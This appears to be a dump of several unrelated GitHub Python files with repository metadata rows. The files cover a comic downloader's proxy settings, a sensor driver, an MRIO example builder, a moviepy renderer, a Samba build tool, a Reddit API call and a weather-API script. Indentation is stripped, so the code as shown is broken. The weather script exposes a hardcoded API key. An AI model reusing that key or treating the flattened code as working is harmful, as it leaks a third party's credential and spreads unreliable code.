MY_CONFIG.set("general","check_is_2_page",str(self.ui.spin_settings_check_is_2_page.value()))
MY_CONFIG.set("reader","background",self.ui.txt_settings_reader_background.text())
MY_CONFIG.set("reader","auto_play_interval",str(self.ui.spin_settings_reader_auto_play_interval.value()))
MY_CONFIG.set("reader","auto_play_pgb",str(self.ui.cbx_settings_reader_auto_play_pgb.currentIndex()))
MY_CONFIG.set("reader","page_gap",str(self.ui.spin_settings_reader_page_gap.value()))
#anti ban
MY_CONFIG.set("anti-ban","page_sleep",str(self.ui.spin_settings_page_sleep.value()))
MY_CONFIG.set("anti-ban","image_sleep",str(self.ui.spin_settings_image_sleep.value()))
MY_CONFIG.set("anti-ban","download_worker",str(self.ui.spin_settings_download_worker.value()))
MY_CONFIG.set("anti-ban","proxy_mode",str(self.ui.cbx_settings_proxy_mode.currentIndex()))
MY_CONFIG.set("anti-ban","proxy_list",json.dumps(self.proxy_list_to_json()))
#real-cugan
MY_CONFIG.set("real-cugan","exe_location",self.ui.txt_settings_cugan_location.text())
MY_CONFIG.set("real-cugan","scale",str(self.ui.spin_settings_cugan_scale.value()))
MY_CONFIG.set("real-cugan","denoise_level",str(self.ui.cbx_settings_cugan_denoise.currentIndex()-1))
MY_CONFIG.set("real-cugan","resize",str(self.ui.cbx_settings_cugan_resize.currentIndex()))
#misc
MY_CONFIG.set("misc","display_message",str(self.ui.radio_settings_message_yes.isChecked()))
MY_CONFIG.set("misc","play_sound",str(self.ui.radio_settings_sound_yes.isChecked()))
MY_CONFIG.set("misc","when_close_window",str(self.ui.cbx_settings_when_close_window.currentIndex()))
MY_CONFIG.save()
WEB_BOT.set_agent(MY_CONFIG.get("general", "agent"))
WEB_BOT.set_time_out(float(MY_CONFIG.get("general", "timeout")))
WEB_BOT.set_max_retry(int(MY_CONFIG.get("general", "max_retry")))
WEB_BOT.set_proxy_mode(int(MY_CONFIG.get("anti-ban", "proxy_mode")))
WEB_BOT.set_proxy_list(MY_CONFIG.get("anti-ban", "proxy_list"))
EXECUTOR = concurrent.futures.ThreadPoolExecutor(max_workers=int(MY_CONFIG.get("anti-ban", "download_worker")))
def try_add_proxy(self,proxy):
if self.check_proxy_exist_in_list(proxy):
return False
item = QListWidgetItem()
item.setText(proxy)
item.setFlags(item.flags() | QtCore.Qt.ItemIsUserCheckable)
item.setCheckState(QtCore.Qt.Checked)
self.ui.list_settings_proxy.addItem(item)
return True
def check_proxy_format(self,proxy):
pattern_proxy = re.compile(r'http([s]?)://(.*?):([0-9]*)')
proxy_info = re.findall(pattern_proxy, proxy)
if len(proxy_info) == 1 and len(proxy_info[0]) == 3:
return True
return False
def check_proxy_exist_in_list(self,proxy):
for i in range(self.ui.list_settings_proxy.count()):
item = self.ui.list_settings_proxy.item(i)
if item.text() == proxy:
return True
return False
def proxy_list_to_json(self):
result = []
for i in range(self.ui.list_settings_proxy.count()):
item = self.ui.list_settings_proxy.item(i)
result.append({
"enable": item.checkState() == QtCore.Qt.Checked,
"url": item.text(),
})
return result
| freedy82/Comic-Toolbox | models/controllers/settings_controller.py | settings_controller.py | py | 14,876 | python | en | code | 13 | github-code | 36 |
20322614716 | import machine
import time
class AHT21:
"""
Lightweight class for communicating with an AHT21 temperature and humidity sensor via I2C.
AHT21 Datasheet:
http://www.aosong.com/userfiles/files/media/AHT21%20%E8%8B%B1%E6%96%87%E7%89%88%E8%AF%B4%E6%98%8E%E4%B9%A6%20A0%202020-12-8.pdf
Code inspired by:
https://github.com/any-sliv/aht21_python_pigpio/blob/main/aht21.py
https://github.com/Thinary/AHT_Sensor/blob/main/AHT_Sensor/src/Thinary_AHT_Sensor.cpp
"""
def __init__(self, i2c:machine.I2C, address = 0x38):
"""
Creates a new instance of the AHT21 class
:param i2c: Setup machine.I2C interface
:param address: The I2C address of the AHT21 slave device
"""
self.i2c = i2c
self.address = address
self.initialize()
def initialize(self) -> None:
"""Initializes (calibrates) the AHT21 sensor"""
self.i2c.writeto(self.address, bytes([0xbe, 0x08, 0x00]))
time.sleep(0.1)
self.i2c.writeto(self.address, bytes([0x71]))
init_check = self.i2c.readfrom(self.address, 1)
if not init_check[0] & 0x68 == 0x08:
raise Exception ("Initialization of AHT21 failed!")
def read(self) -> tuple[float, float]:
"""Reads the relative humidity (as a percentage) and temperature (in degrees celsius) as a tuple, in that order."""
self.i2c.writeto(self.address, bytes([0xac, 0x33, 0x00]))
time.sleep(0.2)
res = self.i2c.readfrom(self.address, 6)
# Relative humidity, as a percentage
rh = ((res[1] << 16) | (res[2] << 8) | res[3]) >> 4;
rh = (rh * 100) / 1048576
# Temperature, in celsius
temp = ((res[3] & 0x0F) << 16) | (res[4] << 8) | res[5];
temp = ((200 * temp) / 1048576) - 50
return (rh, temp)
| TimHanewich/Air-Quality-IoT | src/AHT21.py | AHT21.py | py | 1,880 | python | en | code | 0 | github-code | 36 |
18174515063 | import os
import sys
import pathlib
import pandas as pd
import pymrio as pym
import pickle as pkl
import logging
import argparse
import json
import re
from pymrio.core.mriosystem import IOSystem
SEC_AGG_ODS_FILENAME = "exiobase3_aggregate_to_7_sectors.ods"
PARAMS_ODS_FILENAME ="exiobase3_7_sectors_params.ods"
EXIO3_MONETARY = 1000000
MAIN_INVENTORY_DURATION = 90
PARAMS = {
# The directory to use to store results (relative to output_dir)
"results_storage": "results",
# This tells the model to register the evolution of the stocks
# of every industry (the file can be quite large (2Gbytes+ for
# a 365 days simulation with exiobase))
"register_stocks": True,
# Parameters of the model (we detail these in the documentation)
"psi_param": 0.85,
"order_type": "alt",
# Time division of a year in the model (365 == day, 52 == week, ...)
"year_to_temporal_unit_factor": 365,
# Number of day|week|... of one step of the model (ie time sampling)
"n_temporal_units_by_step": 1,
# Charateristic time of inventory restoration
"inventory_restoration_tau": 60,
# Base overproduction factor
"alpha_base": 1.0,
# Maximum overproduction factor
"alpha_max": 1.25,
# Charateristic time of overproduction
"alpha_tau": 365,
# Charateristic time of rebuilding
"rebuild_tau": 60,
# Number of day|week|... to simulate
"n_temporal_units_to_sim": 700,
# Unused
"min_duration": 700
}
def lexico_reindex(mrio: pym.IOSystem) -> pym.IOSystem:
"""Reindex IOSystem lexicographicaly
Sort indexes and columns of the dataframe of a :ref:`pymrio.IOSystem` by
lexical order.
Parameters
----------
mrio : pym.IOSystem
The IOSystem to sort
Returns
-------
pym.IOSystem
The sorted IOSystem
"""
mrio.Z = mrio.Z.reindex(sorted(mrio.Z.index), axis=0)
mrio.Z = mrio.Z.reindex(sorted(mrio.Z.columns), axis=1)
mrio.Y = mrio.Y.reindex(sorted(mrio.Y.index), axis=0)
mrio.Y = mrio.Y.reindex(sorted(mrio.Y.columns), axis=1)
mrio.x = mrio.x.reindex(sorted(mrio.x.index), axis=0) #type: ignore
mrio.A = mrio.A.reindex(sorted(mrio.A.index), axis=0)
mrio.A = mrio.A.reindex(sorted(mrio.A.columns), axis=1)
return mrio
def full_mrio_pickle(exio3, save_path=None):
scriptLogger.info("Removing IOSystem attributes deemed unnecessary")
attr = ['Z', 'Y', 'x', 'A', 'L', 'unit', 'population', 'meta', '__non_agg_attributes__', '__coefficients__', '__basic__']
tmp = list(exio3.__dict__.keys())
for at in tmp:
if at not in attr:
delattr(exio3,at)
assert isinstance(exio3, IOSystem)
scriptLogger.info("Done")
scriptLogger.info("Computing the missing IO components")
exio3.calc_all()
scriptLogger.info("Done")
scriptLogger.info("Reindexing the dataframes lexicographicaly")
exio3 = lexico_reindex(exio3)
scriptLogger.info("Done")
scriptLogger.info("Saving Full mrio pickle file to {}".format(pathlib.Path(save_path).absolute()))
exio3 = lexico_reindex(exio3)
with open(save_path, 'wb') as f:
pkl.dump(exio3, f)
def aggreg_mrio_pickle(full_exio_path, sector_aggregator_path, save_path=None):
exio_path = pathlib.Path(full_exio_path)
if not exio_path.exists():
raise FileNotFoundError("Exiobase file not found - {}".format(exio_path))
with exio_path.open('rb') as f:
scriptLogger.info("Loading EXIOBASE3 from {}".format(exio_path.resolve()))
exio3 = pkl.load(f)
assert isinstance(exio3, IOSystem)
sec_agg_vec = pd.read_excel(sector_aggregator_path, sheet_name="aggreg_input", engine="odf")
sec_agg_newnames = pd.read_excel(sector_aggregator_path, sheet_name="name_input", engine="odf", index_col=0, squeeze=True)
sec_agg_vec = sec_agg_vec.sort_values(by="sector")
scriptLogger.info("Reading aggregation matrix from sheet 'input' in file {}".format(pathlib.Path(sector_aggregator_path).absolute()))
scriptLogger.info("Aggregating from {} to {} sectors".format(len(exio3.get_sectors()), len(sec_agg_vec.group.unique()))) #type:ignore
sec_agg_vec['new_sectors'] = sec_agg_vec.group.map(sec_agg_newnames.to_dict())
exio3.aggregate(sector_agg=sec_agg_vec.new_sectors.values)
exio3.calc_all()
scriptLogger.info("Done")
scriptLogger.info("Saving to {}".format(pathlib.Path(save_path).absolute()))
exio3 = lexico_reindex(exio3)
with open(save_path, 'wb') as f:
pkl.dump(exio3, f)
def params_from_ods(ods_file,monetary,main_inv_dur):
mrio_params = {}
mrio_params["monetary_factor"] = monetary
mrio_params["main_inv_dur"] = main_inv_dur
df = pd.read_excel(ods_file) #type: ignore
mrio_params["capital_ratio_dict"] = df[["Aggregated version sector", "Capital to VA ratio"]].set_index("Aggregated version sector").to_dict()['Capital to VA ratio']
mrio_params["inventories_dict"] = df[["Aggregated version sector", "Inventory size (days)"]].set_index("Aggregated version sector").to_dict()['Inventory size (days)']
return mrio_params
def event_tmpl_from_ods(ods_file):
event_params = {}
event_params["aff_regions"] = ["FR"]
event_params["dmg_distrib_regions"] = [1]
event_params["dmg_distrib_sectors_type"] = "gdp"
event_params["dmg_distrib_sectors"] = []
event_params["duration"] = 5
event_params["name"] = "Test-event"
event_params["occur"] = 7
event_params["q_dmg"] = 1000000
df = pd.read_excel(ods_file) #type: ignore
event_params["aff_sectors"] = df.loc[(df.Affected=="yes"),"Aggregated version sector"].to_list()
event_params["rebuilding_sectors"] = df.loc[(df["Rebuilding factor"] > 0),["Aggregated version sector", "Rebuilding factor"]].set_index("Aggregated version sector").to_dict()['Rebuilding factor']
return event_params
parser = argparse.ArgumentParser(description="Build a minimal example for BoARIO, from EXIOBASE3 MRIO table zip file")
parser.add_argument('source_path', type=str, help='The str path to the directory with source materials')
parser.add_argument('-o', "--output", type=str, help='The path to the example directory to create', nargs='?', default='./testing-directory/')
args = parser.parse_args()
logFormatter = logging.Formatter("%(asctime)s [%(levelname)-5.5s] %(name)s %(message)s", datefmt="%H:%M:%S")
scriptLogger = logging.getLogger("EXIOBASE3_Minimal_example_generator")
consoleHandler = logging.StreamHandler()
consoleHandler.setFormatter(logFormatter)
scriptLogger.addHandler(consoleHandler)
scriptLogger.setLevel(logging.INFO)
scriptLogger.propagate = False
if __name__ == '__main__':
args = parser.parse_args()
scriptLogger.info("Make sure you use the same python environment when you use the minimal example as now.")
scriptLogger.info("Your current environment is: {}".format(sys.executable))
sec_agg_ods = pathlib.Path(args.source_path)/SEC_AGG_ODS_FILENAME
params_ods = pathlib.Path(args.source_path)/PARAMS_ODS_FILENAME
output_dir = pathlib.Path(args.output)
# Create full mrio pickle file
if not output_dir.exists():
output_dir.mkdir(parents=True, exist_ok=True)
full_exio_pickle_name = "exiobase3_full.pkl"
minimal_exio_name = "exiobase3_minimal.pkl"
params_file_name = "params.json"
mrio_params_file_name = "mrio_params.json"
event_file_name = "event.json"
scriptLogger.info("This will create the following directory, with all required files for the minimal example : {}".format(output_dir.resolve()))
if not sec_agg_ods.exists():
raise FileNotFoundError("Sector aggregator ods file not found - {}".format(sec_agg_ods))
if not params_ods.exists():
raise FileNotFoundError("Params ods file not found - {}".format(params_ods))
if not (output_dir/full_exio_pickle_name).exists():
regex = re.compile(r"(IOT_\d\d\d\d_ixi.zip)")
exio_path = None
for root, dirs, files in os.walk(args.source_path):
scriptLogger.info("Looking for Exiobase3 file here {}".format(args.source_path))
for f in files:
if regex.match(f):
exio_path = (pathlib.Path(args.source_path)/f).resolve()
scriptLogger.info("Found Exiobase3 file here {}".format(exio_path))
break
if exio_path is None:
raise FileNotFoundError("Exiobase file not found in given source directory - {}".format(args.source_path))
scriptLogger.info("Parsing EXIOBASE3 from {} - Note that this takes a few minutes on a powerful laptop. ".format(exio_path.resolve()))
exio3 = pym.parse_exiobase3(path=exio_path)
full_mrio_pickle(exio3, save_path=output_dir/full_exio_pickle_name)
# create minimal mrio pickle file
if not (output_dir/minimal_exio_name).exists():
aggreg_mrio_pickle(output_dir/full_exio_pickle_name, sector_aggregator_path=sec_agg_ods, save_path=output_dir/minimal_exio_name)
# create params file
if not (output_dir/params_file_name).exists():
scriptLogger.info("Generating simulation parameters file : {}".format((output_dir/params_file_name).resolve()))
params = PARAMS
params["output_dir"] = str(output_dir.resolve())
with (output_dir/params_file_name).open("w") as f:
json.dump(params, f, indent=4)
# create mrio_params_file
if not (output_dir/mrio_params_file_name).exists():
scriptLogger.info("Generating mrio parameters file : {}".format((output_dir/mrio_params_file_name).resolve()))
mrio_params = params_from_ods(params_ods, EXIO3_MONETARY, MAIN_INVENTORY_DURATION)
with (output_dir/mrio_params_file_name).open("w") as f:
json.dump(mrio_params, f, indent=4)
# create mrio_params_file
if not (output_dir/event_file_name).exists():
scriptLogger.info("Generating event file : {}".format((output_dir/event_file_name).resolve()))
event_params = event_tmpl_from_ods(params_ods)
with (output_dir/event_file_name).open("w") as f:
json.dump(event_params, f, indent=4)
scriptLogger.info("Done !")
| spjuhel/BoARIO | scripts/generate-example-files.py | generate-example-files.py | py | 10,120 | python | en | code | 6 | github-code | 36 |
36839090820 | import moviepy.editor as me
import numpy as np
from bm_analyze import *
import time
t=open('!r_data.txt')
M=t.read().split('\n')
t.close()
del t
M[0]='[empty]'
start=36000
end=37000
speed=16
time.sleep(120)
render=me.VideoClip(lambda t:np.zeros([1080,1920,3]),duration=(end-start)/speed)#+3*(q+1==k))
clips=[render]
print('Finished making a void')
def parseMatrix(M):
if M=='[empty]':return []
if M=='Limit':return [[1]]
return eval("[" + M.replace(")(", "],[").replace("(", "[").replace(")", "]").replace("?","") + "]")
for i in range(start,end):
a=''
k=0
for j in M[i]:
a+=j
k+=1
if k>=100 and j==')':a+='\n';k=0
obj=me.TextClip(a.replace('(0)(2)','Limit of BMS'),size=(1920,500),color='white',fontsize=25,method='label',align='northwest')
clips.append(obj.set_start((i-start)/speed).set_duration(1/speed).set_pos((10,100)))
if parseMatrix(M[i])<[[0],[1,1,1],[2,1,1],[3,1,1],[2,1,1],[3,1],[2]]:
obj=me.TextClip(prettyprint(toexp(matfromstr(M[i])[0])),size=(1920,600),color='white',fontsize=30,method='label',align='west',font='Courier-New')
clips.append(obj.set_start((i-start)/speed).set_duration(1/speed).set_pos((10,500)))
obj=me.TextClip('Frame {:,}\n≈ {}h {:02}m spent calculating'.format(i,i//6660,i//111%60),size=(1920,500),color='white',fontsize=20,method='label',align='northwest')
clips.append(obj.set_start((i-start)/speed).set_duration(1/speed).set_pos((10,20)))
if i%100==0:
print(i,M[i])
# render=me.CompositeVideoClip(clips)
# clips=[render]
if i%10==0 and i%100!=0:
print(i)
print('Finished creating text')
render=me.CompositeVideoClip(clips)
del clips
print('Finished adding text to the void')
render_=me.VideoFileClip('BMSlngi.mp4')
me.concatenate([render_,render]).write_videofile(f'BMSlngi_.mp4',fps=24)
del render
del render_
| dr2xmillion371/stuff | matrix.py | matrix.py | py | 1,876 | python | en | code | 0 | github-code | 36 |
36891693929 | # a waf tool to add extension based build patterns for Samba
import Task
from TaskGen import extension
from samba_utils import *
from wafsamba import samba_version_file
def write_version_header(task):
'''print version.h contents'''
src = task.inputs[0].srcpath(task.env)
tgt = task.outputs[0].bldpath(task.env)
version = samba_version_file(src, task.env.srcdir, env=task.env)
string = str(version)
f = open(tgt, 'w')
s = f.write(string)
f.close()
return 0
def SAMBA_MKVERSION(bld, target):
'''generate the version.h header for Samba'''
t = bld.SAMBA_GENERATOR('VERSION',
rule=write_version_header,
source= 'VERSION',
target=target,
always=True)
Build.BuildContext.SAMBA_MKVERSION = SAMBA_MKVERSION
| RMerl/asuswrt-merlin | release/src/router/samba-3.6.x/buildtools/wafsamba/samba_patterns.py | samba_patterns.py | py | 861 | python | en | code | 6,715 | github-code | 36 |
10179826987 | #!/usr/bin/python3
"""
Number of subscribers(not active users,total subscribers) for a given subreddit
"""
import requests
def number_of_subscribers(subreddit):
"""
Number of subscribers for a given subreddit from the Reddit API
"""
if subreddit is None or not isinstance(subreddit, str):
return 0
user_agent = {'User-agent': 'Google Chrome Version 81.0.4044.129'}
url = 'https://www.reddit.com/r/{}/about.json'.format(subreddit)
response = requests.get(url, headers=user_agent)
results = response.json()
try:
return results['data']['subscribers']
except Exception:
return 0
| jamesAlhassan/alx-system_engineering-devops | 0x16-api_advanced/0-subs.py | 0-subs.py | py | 646 | python | en | code | 0 | github-code | 36 |
30218578553 | # %%
from urllib import request
from urllib import error
import os
import csv
import codecs
import pandas as pd
import numpy as np
# %%
initial_date = '2018-01-01'
final_date = '2018-01-01'
url = "https://weather.visualcrossing.com/VisualCrossingWebServices/rest/services/timeline/New%20York/" + initial_date + "/" + final_date + "?unitGroup=metric&include=hours&key=HB4HE49PF5XCRSEHAULTVM73D&contentType=csv"
# %%
try:
#ResultBytes = urllib.request.urlopen("https://weather.visualcrossing.com/VisualCrossingWebServices/rest/services/timeline/New%20York/2018-01-01/2018-01-01?unitGroup=metric&include=hours&key=HB4HE49PF5XCRSEHAULTVM73D&contentType=csv")
ResultBytes = request.urlopen(url)
# Parse the results as CSV
CSVText = csv.reader(codecs.iterdecode(ResultBytes, 'utf-8'))
# Parse the results as JSON
#jsonData = json.loads(ResultBytes.decode('utf-8'))
except error.HTTPError as e:
ErrorInfo= e.read().decode()
print('Error code: ', e.code, ErrorInfo)
sys.exit()
except error.URLError as e:
ErrorInfo= e.read().decode()
print('Error code: ', e.code,ErrorInfo)
sys.exit()
# %%
a = []
# %%
for i in CSVText:
a.append(i)
# %%
# Crear dataframe y columnas
df = pd.DataFrame()
for idx, i in enumerate(a[0]):
df[i] = a[1][idx]
# Agregar los registros al dataframe
first = False
for idx, i in enumerate(a):
if first:
df.loc[idx] = i
else:
first = True
# Elimminar columnas "Nombre" y "station" pues no sirven para nuestro analisis
# %%
df.drop(['name','stations'], axis=1,inplace=True)
# Cambiaremos el contenido de la columna "icon" especificando unicamente si es de dia o de noche
def day_night(icon):
return icon.split('-')[-1]
# %%
df.icon = df.icon.apply(day_night)
# La tabla de hechos sera df como weather y separaremos las columnas "condition" y "icon" para crear 2 dimensiones; condition y icon, respectivamente.
# %%
condition = pd.DataFrame()
# %%
condition['condicion'] = df.conditions.unique()
# %%
icon = pd.DataFrame()
# %%
icon['estado'] = df.icon.unique()
# Reemplazar los valores de tabla main por los valores de id en las tablas dimensionales
# %%
def estado (i):
s = i.split('-')[-1]
return (icon[icon.estado == s].index[0])
def cond (i):
s = i.split('-')[-1]
return (condition[condition.condicion == s].index[0])
# %%
df.icon = df.icon.apply(estado)
# %%
df.conditions = df.conditions.apply(cond)
# %% [markdown]
# Cambiamos todos los tipos de dato a strings
# %%
for i in df:
df[i] = df[i].astype('string')
# %%
icon.estado = icon.estado.astype('string')
condition.condicion = condition.condicion.astype('string')
# %% [markdown]
# Crear todos los csv de weather, icon y condition.
# %%
df.to_csv('weather.csv')
icon.to_csv('icono.csv')
condition.to_csv('condicion.csv')
| FabianTatum/GRUPO-14-TAXIS-TRIPS | API weather/apiWeather.py | apiWeather.py | py | 2,964 | python | en | code | 1 | github-code | 36 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.